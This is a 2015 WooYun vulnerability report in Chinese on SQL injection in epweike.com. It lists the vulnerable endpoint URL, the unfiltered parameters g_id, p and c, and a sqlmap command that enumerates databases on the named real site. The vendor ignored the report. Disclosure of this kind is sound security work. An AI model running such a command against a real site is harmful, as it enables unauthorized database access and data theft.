漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-096111
漏洞标题:一品威客主站sql注入二
相关厂商:epweike.com
漏洞作者: 路人甲
提交时间:2015-02-07 13:32
修复时间:2015-02-12 13:34
公开时间:2015-02-12 13:34
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:5
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-02-07: 细节已通知厂商并且等待厂商处理中
2015-02-12: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
一品威客注入第二枚多个参数存在注入没做过滤
详细说明:
注入点http://www.epweike.com/index.php?do=ajax&view=talent_seo&g_id=2&p=&c=&page=1
python sqlmap/sqlmap.py -u "http://www.epweike.com/index.php?do=ajax&view=talent_seo&g_id=2" --dbs
![9J5X)S~TFVSG]79M}9DA9DF.png](http://wimg.zone.ci/upload/201502/062336495e4dcbaede33ec15f99fb4b8934f355c.png)
![MFUCB_L2@5UYW@Q]3TX%LWH.png](http://wimg.zone.ci/upload/201502/06233625da314b135f406ea4cf820af7da0d430b.png)
其他两个参数我不做测试了都一个样
没过滤的参数分别 g_id p c
漏洞证明:
注入点http://www.epweike.com/index.php?do=ajax&view=talent_seo&g_id=2&p=&c=&page=1
python sqlmap/sqlmap.py -u "http://www.epweike.com/index.php?do=ajax&view=talent_seo&g_id=2" --dbs
其他两个参数我不做测试了都一个样
没过滤的参数分别 g_id p c
修复方案:
你懂得 加强防护措施和代码审计
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-02-12 13:34
厂商回复:
最新状态:
暂无